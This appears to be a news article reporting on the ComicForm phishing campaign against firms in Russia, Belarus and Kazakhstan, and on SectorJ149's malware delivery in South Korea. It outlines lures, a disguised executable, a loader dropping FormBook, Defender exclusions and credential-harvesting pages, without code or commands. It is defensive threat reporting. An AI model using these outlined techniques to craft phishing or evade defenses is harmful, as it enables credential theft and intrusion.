Rising Cyber Threats: The ComicForm Phishing Campaign
Recent developments have revealed a significant phishing campaign targeting organizations in Belarus, Kazakhstan, and Russia, attributed to a previously undocumented hacking group known as ComicForm. Active since at least April 2025, this group focuses on a broad range of sectors, including industrial, financial, tourism, biotechnology, research, and trade, according to an analysis by cybersecurity firm F6.
The Mechanism of Attack
ComicForm employs a sophisticated attack chain that begins with phishing emails. These emails often feature deceptive subject lines such as “Waiting for the signed document” and “Invoice for Payment.” Recipients are enticed to open an attached RR archive. Within this archive resides a Windows executable disguised as a PDF file, often labeled with names like "Акт_сверки pdf 010.exe." The emails typically originate from addresses registered under Russian (.ru), Belarusian (.by), and Kazakh (.kz) domains, with messages available in both Russian and English to broaden their reach.
Once the executable is activated, it serves as an obfuscated .NET loader. This loader is engineered to deploy a malicious Dynamic Link Library (DLL) known as "MechMatrix Pro.dll." The campaign escalates further with the initiation of another DLL called "Montero.dll," which operates as a dropper for FormBook malware. Notably, this process avoids detection by creating scheduled tasks and configuring exclusions in Microsoft Defender.
Intriguing Malware Features
A peculiar aspect of this malware includes benign links embedded within the binary code, leading to harmless GIFs of comic superheroes, such as Batman. This unusual detail inspired the group’s name. As noted by F6 researcher Vladislav Kugan, these images were not employed maliciously but were an interesting part of the malware’s coding.
The infrastructure used by ComicForm has shown signs of phishing activities targeting diverse entities. Notably, in June 2025, phishing emails were directed at a company in Kazakhstan, while also affecting a bank in Belarus in April 2025. Recently, on July 25, 2025, F6 noted phishing attempts aimed at Russian manufacturing firms, with emails prompting recipients to verify their accounts through an embedded link.
The Phishing Tactics
Those who click the compromised link are redirected to a fraudulent login page that mimics a legitimate domestic document management system. This tactic is designed to capture login credentials by sending the entered information to an attacker-controlled domain through an HTTP POST request.
In the case of the Belarusian bank, a phishing email featuring an invoice lure aimed to trick users into providing their email addresses and phone numbers, which were subsequently transmitted to an external domain. Kugan emphasized that the group is targeting companies across various sectors in Russia, Belarus, and Kazakhstan. Additionally, the use of English-language emails indicates a broader targeting scope that potentially includes organizations in other countries.
Broader Context: Pro-Russian Cyber Activities
Compounding concerns are recent reports from the NSHC ThreatRecon Team regarding a pro-Russian cybercrime group known as SectorJ149 (or UAC-0050), which has been active in South Korea. This group specifically targets crucial sectors such as manufacturing, energy, and semiconductors. Their activities were first observed in November 2024, starting with spear-phishing emails aimed at executives and staff. These emails often included themes related to production facility purchases or quote requests, leading to the deployment of various malware families, including FormBook and Lumma Stealer.
SectorJ149 utilizes Visual Basic Scripts packaged within Microsoft CAB files, allowing them to launch PowerShell commands. These commands reach out to repositories like Bitbucket or GitHub to download malicious executables disguised as image files. Once the malicious code is executed, it can download and launch additional payloads that pose significant threats to cybersecurity.
An Evolving Threat Landscape
The recent activities of both ComicForm and SectorJ149 underline the rising and evolving threats posed by cybercriminal groups. As they adopt increasingly sophisticated techniques and expand their reach, vigilance is paramount. Organizations in susceptible sectors must remain alert, updating security protocols, and training staff to recognize and respond to phishing attempts effectively. Engaging cybersecurity firms for comprehensive defenses could be a crucial step in mitigating these persistent threats.
